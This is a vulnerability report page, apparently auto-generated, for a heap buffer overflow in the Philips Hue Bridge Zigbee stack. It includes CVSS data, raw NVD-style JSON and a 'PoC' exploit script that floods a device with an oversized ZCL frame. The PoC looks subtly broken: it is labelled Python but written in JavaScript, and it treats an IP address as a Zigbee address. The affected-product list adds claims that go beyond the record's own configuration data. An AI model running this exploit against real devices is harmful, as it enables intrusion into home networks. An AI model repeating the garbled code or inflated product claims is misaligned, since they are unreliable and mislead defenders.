Security Vulnerability Report
中文
CVE-2026-3555 CVSS 8.0 HIGH

CVE-2026-3555

Published: 2026-03-16 14:19:48
Last Modified: 2026-04-27 14:50:08
Source: [email protected]

Description

Philips Hue Bridge Zigbee Stack Custom Command Handler Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Philips Hue Bridge. User interaction is required to exploit this vulnerability in that the user must initiate the device pairing process. The specific flaw exists within the handling of custom Zigbee ZCL frames in the Model Info download functionality. The issue results from the lack of proper validation of the size of data prior to copying it to a fixed-size heap buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28276.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:philips:hue_bridge_v2_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:philips:hue_bridge_v2:-:*:*:*:*:*:*:* - NOT VULNERABLE
Philips Hue Bridge (BSB002) - 固件版本 < 最新安全更新版本
Philips Hue Bridge (BSB001) - 所有已知版本
Philips Hue Bridge 2200/2246 - 所有已知版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-3555 PoC - Philips Hue Bridge Zigbee Heap Buffer Overflow // This PoC demonstrates the heap buffer overflow in Zigbee ZCL frame handling // Note: This is for educational purposes only const zigbee = require('zigbee-herdsman'); async function exploitHueBridge(targetIP) { console.log('[+] CVE-2026-3555 PoC for Philips Hue Bridge'); console.log('[+] Target:', targetIP); // Connect to target Hue Bridge const device = await zigbee.Device.create({ ieeeAddr: targetIP, networkAddress: 0x0000, modelId: 'BSB002', manufacturerName: 'Philips' }); // Craft malicious ZCL frame with oversized data // The ZCL frame triggers Model Info download functionality const maliciousZCLFrame = { frameControl: 0x00, clusterId: 0xFC00, // Philips specific cluster commandId: 0x02, // Custom command for Model Info download payload: Buffer.alloc(512, 0x41), // Overflow data - exceeds heap buffer manufacturerCode: 0x100B, sequenceNumber: 0x01 }; console.log('[+] Sending malicious ZCL frame...'); try { // Send the crafted frame to trigger overflow await device.sendZclFrame(maliciousZCLFrame); console.log('[+] Malicious frame sent'); console.log('[+] If vulnerable, heap corruption should occur'); } catch (error) { console.log('[-] Error:', error.message); } } // Usage: node cve-2026-3555-poc.js <target_ip> exploitHueBridge(process.argv[2] || '192.168.1.100');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3555", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:48.493", "lastModified": "2026-04-27T14:50:08.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Philips Hue Bridge Zigbee Stack Custom Command Handler Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Philips Hue Bridge. User interaction is required to exploit this vulnerability in that the user must initiate the device pairing process.\n\nThe specific flaw exists within the handling of custom Zigbee ZCL frames in the Model Info download functionality. The issue results from the lack of proper validation of the size of data prior to copying it to a fixed-size heap buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28276."}, {"lang": "es", "value": "Vulnerabilidad de ejecución remota de código por desbordamiento de búfer basado en montículo en el gestor de comandos personalizado de la pila Zigbee de Philips Hue Bridge. Esta vulnerabilidad permite a atacantes adyacentes a la red ejecutar código arbitrario en instalaciones afectadas de Philips Hue Bridge. Se requiere interacción del usuario para explotar esta vulnerabilidad, ya que el usuario debe iniciar el proceso de emparejamiento del dispositivo.\n\nLa falla específica existe dentro del manejo de tramas Zigbee ZCL personalizadas en la funcionalidad de descarga de información del modelo. El problema resulta de la falta de validación adecuada del tamaño de los datos antes de copiarlos a un búfer de montículo de tamaño fijo. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del dispositivo. Fue ZDI-CAN-28276."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:philips:hue_bridge_v2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1975170000", "matchCriteriaId": "C4C925A5-D9FB-482D-A98D-F879B1BD21EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:philips:hue_bridge_v2:-:*:*:*:*:*:*:*", "matchCriteriaId": "55B37D18-3A59-423E-9D73-F80DFDB14C4D"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-153/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.